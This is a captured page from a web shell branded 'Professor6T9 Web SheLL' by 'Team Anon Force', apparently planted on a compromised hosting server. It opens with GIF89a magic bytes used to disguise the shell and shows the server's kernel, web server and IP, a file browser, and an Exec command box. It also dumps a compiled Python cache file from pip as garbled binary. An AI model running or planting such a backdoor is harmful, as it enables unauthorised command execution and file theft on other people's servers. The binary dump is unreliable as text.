GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux das102.truehost.cloud 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
LiteSpeed
156.232.88.2
/
opt
/
alt
/
python312
/
lib
/
python3.12
/
site-packages
/
pip
/
_internal
/
utils
/
__pycache__
[ HOME ]
Exec
Submit
glibc.cpython-312.pyc
� G��e) � �p � d dl Z d dlZd dlmZmZ dee fd�Zdee fd�Zdee fd�Zdeeef fd�Z y)� N)�Optional�Tuple�returnc �. � t � xs t � S )z9Returns glibc version string, or None if not using glibc.)�glibc_version_string_confstr�glibc_version_string_ctypes� � ��/builddir/build/BUILDROOT/alt-python312-pip-23.3.1-1.el8.x86_64/opt/alt/python312/lib/python3.12/site-packages/pip/_internal/utils/glibc.py�glibc_version_stringr s � �'�)�J�-H�-J�Jr c � � t j dk( ry t j d� } | �y| j � \ }}|S # t t t f$ r Y yw xY w)z@Primary implementation of glibc_version_string using os.confstr.�win32N�CS_GNU_LIBC_VERSION)�sys�platform�os�confstr�split�AttributeError�OSError� ValueError)�gnu_libc_version�_�versions r r r se � � �|�|�w�����:�:�&;�<���#��%�+�+�-� ��7� �N�� �G�Z�0� ���s �A �A �A�Ac � � ddl } | j d� } |j }| j |_ |� }t |t � s|j d� }|S # t $ r Y yw xY w# t $ r Y yw xY w)z=Fallback implementation of glibc_version_string using ctypes.r N�ascii) �ctypes�ImportError�CDLL�gnu_get_libc_versionr �c_char_p�restype� isinstance�str�decode)r �process_namespacer �version_strs r r r s� � ��� ���D�)���0�E�E�� $*�?�?�� �&�(�K��k�3�'�!�(�(��1�����- � ���� � � ��s"